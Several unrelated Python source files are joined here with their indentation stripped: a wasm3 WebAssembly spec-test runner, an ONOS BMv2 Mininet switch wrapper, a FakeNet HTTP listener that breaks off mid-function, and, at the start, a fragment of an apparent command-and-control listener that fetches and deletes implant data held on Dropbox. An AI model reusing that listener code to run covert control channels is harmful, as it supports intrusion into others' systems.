message = "[!] Error download data from '{}' : {}".format(fileName, err)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
continue
responseData = res.content
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options['Name']['Value']
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
run-spec-test.py | #!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-spec-test.py
# ./run-spec-test.py --spec=opam-1.1.1
# ./run-spec-test.py .spec-v1.1/core/i32.json
# ./run-spec-test.py .spec-v1.1/core/float_exprs.json --line 2070
# ./run-spec-test.py .spec-v1.1/proposals/tail-call/*.json
# ./run-spec-test.py --exec "../build-custom/wasm3 --repl"
#
# Running WASI version with different engines:
# cp ../build-wasi/wasm3.wasm ./
# ./run-spec-test.py --exec "../build/wasm3 wasm3.wasm --repl"
# ./run-spec-test.py --exec "wasmtime --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. --backend=llvm wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer-js run wasm3.wasm --dir=. -- --repl"
# ./run-spec-test.py --exec "wasirun wasm3.wasm --repl"
# ./run-spec-test.py --exec "wavm run --mount-root ./ wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "iwasm --dir=. wasm3.wasm --repl"
#
# TODO
# - Get more tests from: https://github.com/microsoft/ChakraCore/tree/master/test/WasmSpec
# - Fix "Empty Stack" check
# - Check Canonical NaN and Arithmetic NaN separately
# - Fix imports.wast
import argparse
import os, sys, glob, time
import subprocess
import json
import re
import struct
import math
import pathlib
scriptDir = os.path.dirname(os.path.abspath(sys.argv[0]))
sys.path.append(os.path.join(scriptDir, '..', 'extra'))
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3 --repl")
parser.add_argument("--spec", default="v1.1")
parser.add_argument("--timeout", type=int, default=30)
parser.add_argument("--line", metavar="<source line>", type=int)
parser.add_argument("--all", action="store_true")
parser.add_argument("--show-logs", action="store_true")
parser.add_argument("--format", choices=["raw", "hex", "fp"], default="fp")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-s", "--silent", action="store_true")
parser.add_argument("file", nargs='*')
args = parser.parse_args()
if args.line:
args.show_logs = True
#
# Utilities
#
log = open("spec-test.log","w+")
log.write("======================\n")
def warning(msg, force=False):
log.write("Warning: " + msg + "\n")
log.flush()
if args.verbose or force:
print(f"{ansi.WARNING}Warning:{ansi.ENDC} {msg}")
def fatal(msg):
log.write("Fatal: " + msg + "\n")
log.flush()
print(f"{ansi.FAIL}Fatal:{ansi.ENDC} {msg}")
sys.exit(1)
def safe_fn(fn):
keepcharacters = (' ','.','_','-')
return "".join(c for c in fn if c.isalnum() or c in keepcharacters).strip()
def binaryToFloat(num, t):
if t == "f32":
return struct.unpack('!f', struct.pack('!L', int(num)))[0]
elif t == "f64":
return struct.unpack('!d', struct.pack('!Q', int(num)))[0]
else:
fatal(f"Unknown type '{t}'")
def escape_str(s):
if s == "":
return r'\x00'
if all((ord(c) < 128 and c.isprintable() and c not in " \n\r\t\\") for c in s):
return s
return '\\x' + '\\x'.join('{0:02x}'.format(x) for x in s.encode('utf-8'))
#
# Value format options
#
def formatValueRaw(num, t):
return str(num)
def formatValueHex(num, t):
if t == "f32" or t == "i32":
return "{0:#0{1}x}".format(int(num), 8+2)
elif t == "f64" or t == "i64":
return "{0:#0{1}x}".format(int(num), 16+2)
else:
return str(num)
def formatValueFloat(num, t):
if t == "f32":
s = 6
elif t == "f64":
s = 10
else:
return str(num)
result = "{0:.{1}f}".format(binaryToFloat(num, t), s).rstrip('0')
if result.endswith('.'):
result = result + '0'
if len(result) > s*2:
result = "{0:.{1}e}".format(binaryToFloat(num, t), s)
return result
formaters = {
'raw': formatValueRaw,
'hex': formatValueHex,
'fp': formatValueFloat,
}
formatValue = formaters[args.format]
if args.format == "fp":
print("When using fp display format, values are compared loosely (some tests may produce false positives)")
#
# Spec tests preparation
#
spec_dir = os.path.join(".", ".spec-" + safe_fn(args.spec))
if not (os.path.isdir(spec_dir)):
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
officialSpec = f"https://github.com/wasm3/wasm-core-testsuite/archive/{args.spec}.zip"
print(f"Downloading {officialSpec}")
resp = urlopen(officialSpec)
with ZipFile(BytesIO(resp.read())) as zipFile:
for zipInfo in zipFile.infolist():
if re.match(r".*-.*/.*/.*(\.wasm|\.json)", zipInfo.filename):
parts = pathlib.Path(zipInfo.filename).parts
newpath = str(pathlib.Path(*parts[1:-1]))
newfn = str(pathlib.Path(*parts[-1:]))
ensure_path(os.path.join(spec_dir, newpath))
newpath = os.path.join(spec_dir, newpath, newfn)
zipInfo.filename = newpath
zipFile.extract(zipInfo)
#
# Wasm3 REPL
#
from subprocess import Popen, STDOUT, PIPE
from threading import Thread
from queue import Queue, Empty
import shlex
class Wasm3():
def __init__(self, exe):
self.exe = exe
self.p = None
self.loaded = None
self.timeout = args.timeout
self.autorestart = True
self.run()
def run(self):
if self.p:
self.terminate()
cmd = shlex.split(self.exe)
#print(f"wasm3: Starting {' '.join(cmd)}")
self.q = Queue()
self.p = Popen(cmd, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
def _read_output(out, queue):
for data in iter(lambda: out.read(1024), b''):
queue.put(data)
queue.put(None)
self.t = Thread(target=_read_output, args=(self.p.stdout, self.q))
self.t.daemon = True
self.t.start()
try:
self._read_until("wasm3> ")
except Exception as e:
print(f"wasm3: Could not start: {e}")
def restart(self):
print(f"wasm3: Restarting")
for i in range(10):
try:
self.run()
try:
if self.loaded:
self.load(self.loaded)
except Exception as e:
pass
break
except Exception as e:
print(f"wasm3: {e} => retry")
time.sleep(0.1)
def init(self):
return self._run_cmd(f":init\n")
def version(self):
return self._run_cmd(f":version\n")
def load(self, fn):
self.loaded = None
with open(fn,"rb") as f:
wasm = f.read()
res = self._run_cmd(f":load-hex {len(wasm)}\n{wasm.hex()}\n")
self.loaded = fn
return res
def invoke(self, cmd):
return self._run_cmd(":invoke " + " ".join(map(str, cmd)) + "\n")
def _run_cmd(self, cmd):
if self.autorestart and not self._is_running():
self.restart()
self._flush_input()
#print(f"wasm3: {cmd.strip()}")
self._write(cmd)
return self._read_until("wasm3> ")
def _read_until(self, token):
buff = ""
tout = time.time() + self.timeout
error = None
while time.time() < tout:
try:
data = self.q.get(timeout=0.1)
if data is None:
error = "Crashed"
break
buff = buff + data.decode("utf-8")
idx = buff.rfind(token)
if idx >= 0:
return buff[0:idx].strip()
except Empty:
pass
else:
error = "Timeout"
self.terminate()
raise Exception(error)
def _write(self, data):
self.p.stdin.write(data.encode("utf-8"))
self.p.stdin.flush()
def _is_running(self):
return self.p and (self.p.poll() is None)
def _flush_input(self):
while not self.q.empty():
self.q.get()
def terminate(self):
self.p.stdin.close()
self.p.terminate()
self.p.wait(timeout=1.0)
self.p = None
#
# Multi-value result handling
#
def parseResults(s):
values = s.split(", ")
values = [x.split(":") for x in values]
values = [{ "type": x[1], "value": int(x[0]) } for x in values]
return normalizeResults(values)
def normalizeResults(values):
for x in values:
t = x["type"]
v = x["value"]
if t == "f32" or t == "f64":
if v == "nan:canonical" or v == "nan:arithmetic" or math.isnan(binaryToFloat(v, t)):
x["value"] = "nan:any"
else:
x["value"] = formatValue(v, t)
else:
x["value"] = formatValue(v, t)
return values
def combineResults(values):
values = [x["value"]+":"+x["type"] for x in values]
return ", ".join(values)
#
# Actual test
#
wasm3 = Wasm3(args.exec)
wasm3_ver = wasm3.version()
print(wasm3_ver)
blacklist = Blacklist([
"float_exprs.wast:* f32.nonarithmetic_nan_bitpattern*",
"imports.wast:*",
"names.wast:* *.wasm \\x00*", # names that start with '\0'
])
if wasm3_ver in Blacklist(["* on i386* MSVC *", "* on i386* Clang * for Windows"]):
warning("Win32 x86 has i64->f32 conversion precision issues, skipping some tests", True)
# See: https://docs.microsoft.com/en-us/cpp/c-runtime-library/floating-point-support
blacklist.add([
"conversions.wast:* f32.convert_i64_u(9007199791611905)",
"conversions.wast:* f32.convert_i64_u(9223371761976868863)",
"conversions.wast:* f32.convert_i64_u(9223372586610589697)",
])
elif wasm3_ver in Blacklist(["* on mips* GCC *"]):
warning("MIPS has NaN representation issues, skipping some tests", True)
blacklist.add([
"float_exprs.wast:* *_nan_bitpattern(*",
"float_exprs.wast:* *no_fold_*",
])
elif wasm3_ver in Blacklist(["* on sparc* GCC *"]):
warning("SPARC has NaN representation issues, skipping some tests", True)
blacklist.add([
"float_exprs.wast:* *.canonical_nan_bitpattern(0, 0)",
])
stats = dotdict(total_run=0, skipped=0, failed=0, crashed=0, timeout=0, success=0, missing=0)
# Convert some trap names from the original spec
trapmap = {
"unreachable": "unreachable executed"
}
def runInvoke(test):
test.cmd = [test.action.field]
displayArgs = []
for arg in test.action.args:
test.cmd.append(arg['value'])
displayArgs.append(formatValue(arg['value'], arg['type']))
test_id = f"{test.source} {test.wasm} {test.cmd[0]}({', '.join(test.cmd[1:])})"
if test_id in blacklist and not args.all:
warning(f"Skipped {test_id} (blacklisted)")
stats.skipped += 1
return
if args.verbose:
print(f"Running {test_id}")
stats.total_run += 1
output = ""
actual = None
actual_val = None
force_fail = False
try:
output = wasm3.invoke(test.cmd)
except Exception as e:
actual = f"<{e}>"
force_fail = True
# Parse the actual output
if not actual:
result = re.findall(r'Result: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "result " + result[-1]
actual_val = result[0]
if not actual:
result = re.findall(r'Error: \[trap\] (.*?) \(', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "trap " + result[-1]
if not actual:
result = re.findall(r'Error: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "error " + result[-1]
if not actual:
actual = "<No Result>"
force_fail = True
if actual == "error no operation ()":
actual = "<Not Implemented>"
stats.missing += 1
force_fail = True
elif actual == "<Crashed>":
stats.crashed += 1
force_fail = True
elif actual == "<Timeout>":
stats.timeout += 1
force_fail = True
# Prepare the expected result
expect = None
if "expected" in test:
if len(test.expected) == 0:
expect = "result <Empty Stack>"
else:
if actual_val is not None:
actual = "result " + combineResults(parseResults(actual_val))
expect = "result " + combineResults(normalizeResults(test.expected))
elif "expected_trap" in test:
if test.expected_trap in trapmap:
test.expected_trap = trapmap[test.expected_trap]
expect = "trap " + str(test.expected_trap)
elif "expected_anything" in test:
expect = "<Anything>"
else:
expect = "<Unknown>"
def showTestResult():
print(" ----------------------")
print(f"Test: {ansi.HEADER}{test_id}{ansi.ENDC}")
print(f"Args: {', '.join(displayArgs)}")
print(f"Expected: {ansi.OKGREEN}{expect}{ansi.ENDC}")
print(f"Actual: {ansi.WARNING}{actual}{ansi.ENDC}")
if args.show_logs and len(output):
print(f"Log:")
print(output)
log.write(f"{test.source}\t|\t{test.wasm} {test.action.field}({', '.join(displayArgs)})\t=>\t\t")
if actual == expect or (expect == "<Anything>" and not force_fail):
stats.success += 1
log.write(f"OK: {actual}\n")
if args.line:
showTestResult()
else:
stats.failed += 1
log.write(f"FAIL: {actual}, should be: {expect}\n")
if args.silent:
return
showTestResult()
#sys.exit(1)
if args.file:
jsonFiles = args.file
else:
jsonFiles = glob.glob(os.path.join(spec_dir, "core", "*.json"))
jsonFiles += glob.glob(os.path.join(spec_dir, "proposals", "sign-extension-ops", "*.json"))
jsonFiles += glob.glob(os.path.join(spec_dir, "proposals", "nontrapping-float-to-int-conversions", "*.json"))
jsonFiles = list(map(lambda x: os.path.relpath(x, scriptDir), jsonFiles))
jsonFiles.sort()
for fn in jsonFiles:
with open(fn, encoding='utf-8') as f:
data = json.load(f)
wast_source = filename(data["source_filename"])
wasm_module = ""
print(f"Running {fn}")
wasm3.init()
for cmd in data["commands"]:
test = dotdict()
test.line = int(cmd["line"])
test.source = wast_source + ":" + str(test.line)
test.wasm = wasm_module
test.type = cmd["type"]
if test.type == "module":
wasm_module = cmd["filename"]
if args.verbose:
print(f"Loading {wasm_module}")
try:
wasm_fn = os.path.join(pathname(fn), wasm_module)
res = wasm3.load(wasm_fn)
if res:
warning(res)
except Exception as e:
pass #fatal(str(e))
elif ( test.type == "action" or
test.type == "assert_return" or
test.type == "assert_trap" or
test.type == "assert_exhaustion" or
test.type == "assert_return_canonical_nan" or
test.type == "assert_return_arithmetic_nan"):
if args.line and test.line != args.line:
continue
if test.type == "action":
test.expected_anything = True
elif test.type == "assert_return":
test.expected = cmd["expected"]
elif test.type == "assert_return_canonical_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:canonical"
elif test.type == "assert_return_arithmetic_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:arithmetic"
elif test.type == "assert_trap":
test.expected_trap = cmd["text"]
elif test.type == "assert_exhaustion":
test.expected_trap = "stack overflow"
else:
stats.skipped += 1
warning(f"Skipped {test.source} ({test.type} not implemented)")
continue
test.action = dotdict(cmd["action"])
if test.action.type == "invoke":
# TODO: invoking in modules not implemented
if test.action.module:
stats.skipped += 1
warning(f"Skipped {test.source} (invoke in module)")
continue
test.action.field = escape_str(test.action.field)
runInvoke(test)
else:
stats.skipped += 1
warning(f"Skipped {test.source} (unknown action type '{test.action.type}')")
# These are irrelevant
elif (test.type == "assert_invalid" or
test.type == "assert_malformed" or
test.type == "assert_uninstantiable"):
pass
# Others - report as skipped
else:
stats.skipped += 1
warning(f"Skipped {test.source} ('{test.type}' not implemented)")
if (stats.failed + stats.success) != stats.total_run:
warning("Statistics summary invalid", True)
pprint(stats)
if stats.failed > 0:
failed = (stats.failed*100)/stats.total_run
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {failed:.2f}%")
if stats.crashed > 0:
print(f" Crashed: {stats.crashed}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
elif stats.success > 0:
print(f"{ansi.OKGREEN}=======================")
print(f" {stats.success}/{stats.total_run} tests OK")
if stats.skipped > 0:
print(f"{ansi.WARNING} ({stats.skipped} tests skipped){ansi.OKGREEN}")
print(f"======================={ansi.ENDC}")
elif stats.total_run == 0:
print("Error: No tests run")
sys.exit(1)
|
bmv2.py | import json
import multiprocessing
import os
import random
import re
import socket
import threading
import urllib2
from contextlib import closing
import time
from mininet.log import info, warn
from mininet.node import Switch, Host
SIMPLE_SWITCH_GRPC = 'simple_switch_grpc'
PKT_BYTES_TO_DUMP = 80
VALGRIND_PREFIX = 'valgrind --leak-check=yes'
SWITCH_START_TIMEOUT = 5 # seconds
BMV2_LOG_LINES = 5
BMV2_DEFAULT_DEVICE_ID = 1
def parseBoolean(value):
if value in ['1', 1, 'true', 'True']:
return True
else:
return False
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def watchDog(sw):
while True:
if ONOSBmv2Switch.mininet_exception == 1:
sw.killBmv2(log=False)
return
if sw.stopped:
return
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
if s.connect_ex(('127.0.0.1', sw.grpcPort)) == 0:
time.sleep(1)
else:
warn("\n*** WARN: BMv2 instance %s died!\n" % sw.name)
sw.printBmv2Log()
print ("-" * 80) + "\n"
return
class ONOSHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
class ONOSBmv2Switch(Switch):
"""BMv2 software switch with gRPC server"""
# Shared value used to notify to all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
def __init__(self, name, json=None, debugger=False, loglevel="warn",
elogger=False, grpcport=None, cpuport=255, notifications=False,
thriftport=None, netcfg=True, dryrun=False, pipeconf="",
pktdump=False, valgrind=False, gnmi=False,
portcfg=True, onosdevid=None, **kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = grpcport
self.thriftPort = thriftport
self.cpuPort = cpuport
self.json = json
self.debugger = parseBoolean(debugger)
self.notifications = parseBoolean(notifications)
self.loglevel = loglevel
# Important: Mininet removes all /tmp/*.log files in case of exceptions.
# We want to be able to see the bmv2 log if anything goes wrong, hence
# avoid the .log extension.
self.logfile = '/tmp/bmv2-%s-log' % self.name
self.elogger = parseBoolean(elogger)
self.pktdump = parseBoolean(pktdump)
self.netcfg = parseBoolean(netcfg)
self.dryrun = parseBoolean(dryrun)
self.valgrind = parseBoolean(valgrind)
self.netcfgfile = '/tmp/bmv2-%s-netcfg.json' % self.name
self.pipeconfId = pipeconf
self.injectPorts = parseBoolean(portcfg)
self.withGnmi = parseBoolean(gnmi)
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
self.onosDeviceId = "device:bmv2:%s" % self.name
self.logfd = None
self.bmv2popen = None
self.stopped = False
# Remove files from previous executions
self.cleanupTmpFiles()
def getSourceIp(self, dstIP):
"""
Queries the Linux routing table to get the source IP that can talk with
dstIP, and vice versa.
"""
ipRouteOut = self.cmd('ip route get %s' % dstIP)
r = re.search(r"src (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", ipRouteOut)
return r.group(1) if r else None
def getDeviceConfig(self, srcIP):
basicCfg = {
"driver": "bmv2"
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
cfgData = {
"generalprovider": {
"p4runtime": {
"ip": srcIP,
"port": self.grpcPort,
"deviceId": BMV2_DEFAULT_DEVICE_ID,
"deviceKeyId": "p4runtime:%s" % self.onosDeviceId
},
"bmv2-thrift": {
"ip": srcIP,
"port": self.thriftPort
}
},
"piPipeconf": {
"piPipeconfId": self.pipeconfId
},
"basic": basicCfg
}
if self.withGnmi:
cfgData["generalprovider"]["gnmi"] = {
"ip": srcIP,
"port": self.grpcPort
}
if self.injectPorts:
portData = {}
portId = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
portData[str(portId)] = {
"number": portId,
"name": intfName,
"enabled": True,
"removed": False,
"type": "copper",
"speed": 10000
}
portId += 1
cfgData['ports'] = portData
return cfgData
def doOnosNetcfg(self, controllerIP):
"""
Notifies ONOS about the new device via Netcfg.
"""
srcIP = self.getSourceIp(controllerIP)
if not srcIP:
warn("*** WARN: unable to get switch IP address, won't do netcfg\n")
return
cfgData = {
"devices": {
self.onosDeviceId: self.getDeviceConfig(srcIP)
}
}
with open(self.netcfgfile, 'w') as fp:
json.dump(cfgData, fp, indent=4)
if not self.netcfg:
# Do not push config to ONOS.
return
# Build netcfg URL
url = 'http://%s:8181/onos/v1/network/configuration/' % controllerIP
# Instantiate password manager for HTTP auth
pm = urllib2.HTTPPasswordMgrWithDefaultRealm()
pm.add_password(None, url,
os.environ['ONOS_WEB_USER'],
os.environ['ONOS_WEB_PASS'])
urllib2.install_opener(urllib2.build_opener(
urllib2.HTTPBasicAuthHandler(pm)))
# Push config data to controller
req = urllib2.Request(url, json.dumps(cfgData),
{'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
print f.read()
f.close()
except urllib2.URLError as e:
warn("*** WARN: unable to push config to ONOS (%s)\n" % e.reason)
def start(self, controllers):
bmv2Args = [SIMPLE_SWITCH_GRPC] + self.grpcTargetArgs()
if self.valgrind:
bmv2Args = VALGRIND_PREFIX.split() + bmv2Args
cmdString = " ".join(bmv2Args)
if self.dryrun:
info("\n*** DRY RUN (not executing bmv2)")
info("\nStarting BMv2 target: %s\n" % cmdString)
writeToFile("/tmp/bmv2-%s-grpc-port" % self.name, self.grpcPort)
writeToFile("/tmp/bmv2-%s-thrift-port" % self.name, self.thriftPort)
try:
if not self.dryrun:
# Start the switch
self.logfd = open(self.logfile, "w")
self.bmv2popen = self.popen(cmdString,
stdout=self.logfd,
stderr=self.logfd)
self.waitBmv2Start()
# We want to be notified if BMv2 dies...
threading.Thread(target=watchDog, args=[self]).start()
self.doOnosNetcfg(self.controllerIp(controllers))
except Exception:
ONOSBmv2Switch.mininet_exception = 1
self.killBmv2()
self.printBmv2Log()
raise
def grpcTargetArgs(self):
if self.grpcPort is None:
self.grpcPort = pickUnusedPort()
if self.thriftPort is None:
self.thriftPort = pickUnusedPort()
args = ['--device-id %s' % str(BMV2_DEFAULT_DEVICE_ID)]
for port, intf in self.intfs.items():
if not intf.IP():
args.append('-i %d@%s' % (port, intf.name))
args.append('--thrift-port %s' % self.thriftPort)
if self.notifications:
ntfaddr = 'ipc:///tmp/bmv2-%s-notifications.ipc' % self.name
args.append('--notifications-addr %s' % ntfaddr)
if self.elogger:
nanologaddr = 'ipc:///tmp/bmv2-%s-nanolog.ipc' % self.name
args.append('--nanolog %s' % nanologaddr)
if self.debugger:
dbgaddr = 'ipc:///tmp/bmv2-%s-debug.ipc' % self.name
args.append('--debugger-addr %s' % dbgaddr)
args.append('--log-console')
if self.pktdump:
args.append('--pcap --dump-packet-data %s' % PKT_BYTES_TO_DUMP)
args.append('-L%s' % self.loglevel)
if not self.json:
args.append('--no-p4')
else:
args.append(self.json)
# gRPC target-specific options
args.append('--')
args.append('--cpu-port %s' % self.cpuPort)
args.append('--grpc-server-addr 0.0.0.0:%s' % self.grpcPort)
return args
def waitBmv2Start(self):
# Wait for switch to open gRPC port, before sending ONOS the netcfg.
# Include time-out just in case something hangs.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
endtime = time.time() + SWITCH_START_TIMEOUT
while True:
result = sock.connect_ex(('127.0.0.1', self.grpcPort))
if result == 0:
# The port is open. Let's go! (Close socket first)
sock.close()
break
# Port is not open yet. If there is time, we wait a bit.
if endtime > time.time():
time.sleep(0.1)
else:
# Time's up.
raise Exception("Switch did not start before timeout")
def printBmv2Log(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
@staticmethod
def controllerIp(controllers):
try:
# onos.py
clist = controllers[0].nodes()
except AttributeError:
clist = controllers
assert len(clist) > 0
return random.choice(clist).IP()
def killBmv2(self, log=False):
if self.bmv2popen is not None:
self.bmv2popen.kill()
if self.logfd is not None:
if log:
self.logfd.write("*** PROCESS TERMINATED BY MININET ***\n")
self.logfd.close()
def cleanupTmpFiles(self):
self.cmd("rm -f /tmp/bmv2-%s-*" % self.name)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.stopped = True
self.killBmv2(log=True)
Switch.stop(self, deleteIntfs)
# Exports for bin/mn
switches = {'onosbmv2': ONOSBmv2Switch}
hosts = {'onoshost': ONOSHost}
|
HTTPListener.py | import logging
import os
import sys
import threading
import SocketServer
import BaseHTTPServer
import ssl
import socket
import posixpath
import mimetypes
import time
MIME_FILE_RESPONSE = {
'text/html': 'FakeNet.html',
'image/png': 'FakeNet.png',
'image/ico': 'FakeNet.ico',
'image/jpeg': 'FakeNet.jpg',
'application/octet-stream': 'FakeNetMini.exe',
'application/x-msdownload': 'FakeNetMini.exe',
'application/pdf': 'FakeNet.pdf',
'application/xml': 'FakeNet.html'
}
class HTTPListener():
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
extensions_map = mimetypes.types_map.copy()
extensions_map.update({
'': 'text/html', # Default
})
def __init__(self, config = {}, name = 'HTTPListener', logging_level = logging.DEBUG):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
# Initialize webroot directory
self.webroot_path = self.config.get('webroot','defaultFiles')
# Try absolute path first
if not os.path.exists(self.webroot_path):
# Try to locate the webroot directory relative to application path
self.webroot_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), self.webroot_path)
if not os.path.exists(self.webroot_path):
self.logger.error('Could not locate webroot directory: %s', self.webroot_path)
sys.exit(1)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedHTTPServer((self.local_ip, int(self.config.get('port'))), ThreadedHTTPRequestHandler)
self.server.logger = self.logger
self.server.config = self.config
self.server.webroot_path = self.webroot_path
self.server.extensions_map = self.extensions_map
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket.')
keyfile_path = 'privkey.pem'
if not os.path.exists(keyfile_path):
keyfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), keyfile_path)
if not os.path.exists(keyfile_path):
self.logger.error('Could not locate privkey.pem')
sys.exit(1)
certfile_path = 'server.pem'
if not os.path.exists(certfile_path):
certfile_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), certfile_path)
if not os.path.exists(certfile_path):
self.logger.error('Could not locate certfile.pem')
sys.exit(1)
self.server.socket = ssl.wrap_socket(self.server.socket, keyfile=keyfile_path, certfile=certfile_path, server_side=True, ciphers='RSA')
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.info('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedHTTPServer(BaseHTTPServer.HTTPServer):
def handle_error(self, request, client_address):
exctype, value = sys.exc_info()[:2]
self.logger.error('Error: %s', value)
class ThreadedHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, *args):
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def setup(self):
self.request.settimeout(int(self.server.config.get('timeout', 10)))
BaseHTTPServer.BaseHTTPRequestHandler.setup(self)
def do_HEAD(self):
self.server.logger.info('Received HEAD request')
# Process request
self.server.logger.info('%s', '-'*80)
self.server.logger.info(self.requestline)
for line in str(self.headers).split("\n"):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80)
# Prepare response
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
self.server.logger.info('Received a GET request.')
# Process request
self.server.logger.info('%s', '-'*80)
self.server.logger.info(self.requestline)
for line in str(self.headers).split("\n"):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80)
# Get response type based on the requested path
response, response_type = self.get_response(self.path)
# Prepare response
self.send_response(200)
self.send_header("Content-Type", response_type)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
def do_POST(self):
self.server.logger.info('Received a POST request')
post_body = ''
content_len = int(self.headers.get('content-length', 0))
post_body = self.rfile.read(content_len)
# Process request
self.server.logger.info('%s', '-'*80)
self.server.logger.info(self.requestline)
for line in str(self.headers).split("\n"):
self.server.logger.info(line)
for line in post_body.split("\n"):
self.server.logger.info(line)
self.server.logger.info('%s', '-'*80)
# Store HTTP Posts
if self.server.config.get('dumphttpposts') and self.server.config['dumphttpposts'].lower() == 'yes':
http_filename = "%s_%s.txt" % (self.server.config.get('dumphttppostsfileprefix', 'http'), time.strftime("%Y%m%d_%H%M%S"))
self.server.logger.info('Storing HTTP POST headers and data to %s.', http_filename)
http_f = open(http_filename, 'wb')
if http_f:
http_f.write(self.requestline + "\r\n")
http_f.write(str(self.headers) + "\r\n")
http_f.write(post_body)
http_f.close()
else:
self.server.logger.error('Failed to write HTTP POST headers and data to %s.', http_filename)
# Get response type based on the requested path
response, response_type = self.get_response(self.path)
# Prepare response
self.send_response(200)
self.send_header("Content-Type", response_type)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
def get_response(self, path):
response = "<html><head><title>FakeNet</title><body><h1>FakeNet</h1></body></html>"
response_type = 'text/html'
if path[-1] == '/':
response_type = 'text/html'
path += 'index.html'
else:
_, ext = posixpath.splitext(path)
response_type = self.server.extensions_map.get(ext, 'text/html')
response_filename = os.path.join(self.server.webroot_path, path[1:])
# Check the requested path exists
if not os.path.exists(response_filename):
self.server.logger.debug('Could not find path: %s', response_filename)
# Try default MIME file
